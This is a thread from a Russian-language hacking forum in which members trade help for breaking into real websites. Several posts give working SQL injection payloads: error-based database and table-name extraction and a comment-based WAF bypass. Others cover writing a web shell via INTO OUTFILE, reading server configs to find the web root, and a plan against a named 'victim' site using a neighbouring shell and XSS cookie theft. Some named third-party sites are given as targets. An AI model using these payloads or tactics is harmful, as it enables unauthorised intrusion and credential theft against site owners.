Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BuG_4F

    BuG_4F Member

    Joined:
    20 May 2008
    Messages:
    88
    Likes Received:
    67
    Reputations:
    5
    Подскажите как раскрутить эту иньекцию:

     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://site.ru/announcements/123'+and+1=1+--+/
    и по накатанной, а дальше если, что не так, иди к шайтану.
     
    _________________________
  3. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Парни, нашел уязвимость пытаюсь раскрутить ее через blind injection.
    Узнал версию, имя базы, но при обращении к ней выдает ошибку
    Invalid query: SELECT command denied to user 'xxxxxx'@'xxxxx' for table 'users'
    Значит, я никак не раскручу скулю или есть варианты?
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    скорее всего обращаешься к таблице users из базы mysql, а доступ к нему не всегда есть.

    ищи подходящие таблицы в текущей базе

    select table_name from information_schema.tables where table_schema=database()
     
    _________________________
  5. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Konqi, буду очень благодарен, если подскажете на примере, как осуществить. Вот мой запрос:
    CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2))) --

    Ответ: Invalid query: Duplicate entry '5.1.311' for key 'group_key'
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
     
    _________________________
  7. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Спасибо, помогло! Кручу дальше!
     
  8. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    где можно найти инфу про то какие браузеры какие симолы урл энкодят?

    к примеру фф превращает ' в %27 а опера нет.

    где найти инфу об этом?
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    помогите админа вытащить :)
    http://www.grc.tomsk.ru/
    GET vote%5B2%5D%5B%5D=7 - скуля

    почему то дальше имени бд не идет.
     
  10. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Привилегия File, Dba - False
    В sqlmap есть команда --sql-shell
    sql-shell> Что дальше ? Не пойму с командами , как понял select MiniShell into outfile "/dir/shell.php"
    Прошу помощи
     
    #23530 yeti2, 1 Sep 2014
    Last edited: 1 Sep 2014
  11. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Code:
    site.com/index.php?id=1+union+select+1,2,3+--+
    Forbidden

    You don't have permission to access /index.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    Code:
    site.com/index.php?id=1+un/**/ion+se/**/lect+1,2,3+--+
    [DATABASE ERROR:]1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'un/**/ion se/**/lect 1,2,3 --' at line 1


    wtf?
     
  12. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Как узнать корневую папку до сайта?
    Есть полные права , не могу залить шелл , не зная корневую папку
     
  13. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Not WTF - WAF.

    1) Перебор
    2) Чтение конфигов, раз есть file_priv
    3) Выбивание ошибок из скриптов
    4) Гугление по варнингам\еррорам\нотисам для site:site.com
     
  14. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Какие именно конфиги?
     
  15. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Конфиги, вы не поверите, веб-сервера, который обсуживает виртуальные хосты. То ли в уязвимостях, то ли в избранном есть топик со списками дефолтных путей к конфигам.
     
  16. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    Ребят,посоветуйте в какую сторону копать,плз

    Ситуация такая:
    Жертва на DLE 9.x,админка доступна по адресу site.com/admin.php
    Есть шелл на соседе,с правами юзера соседа(попасть в папку "public_html" жертвы нет прав,нужны минимум права апача)
    Есть доступ к access логам жертвы.Судя по логам в админку он заходит редко,либо админит в основном через панель хостинга.
    В папке /tmp хранятся файлы сессий всех сайтов на сервере,но доступа к их содержимому нет(для входа в админку DLE нужно в куках передать переменную с пассом админа)

    Собственно,интересно узнать:
    1)возможно ли повысить права до апача? или есть другие способы пробраться в папку сайта жертвы?
    2)каким образом можно выудить куки админа?
    3)другие возможные векторы атак

    Help me,guys,please :rolleyes:
     
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    1) Зависит от ядра
    2) xss
    3) другие возможные векторы атак
     
    _________________________
  18. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1

    1) Uname: Linux 2.6.18-371.1.2.el5PAE #1 SMP Tue Oct 22 13:40:39 EDT 2013 i686
    Рут маловероятен,интересно подняться до апача.Возможно ли это вообще?
    2) С техникой эксплуатации ХСС мало знаком,но т.к. админ почти не заходит на сайт и версия ДЛЕ более-менее свежая(>9.5,паблик хсс под нее не встречал) - "кража" кук мне представляется невозможной
    Известна почта админа(которая находится на том же сервере,что и сайт) - возможно ли получить куки,отправив "специальное" письмо админу?
    3) Smooth
     
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    нашел на одном из сайтов _http://armydocs.ru/config.php , как это работает, сталкивался кто нибудь? :)
     
  20. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Да в общем-то ничего. Стандартный Symlink, который данные из конфигов с соседних сайтов.
     
Thread Status:
Not open for further replies.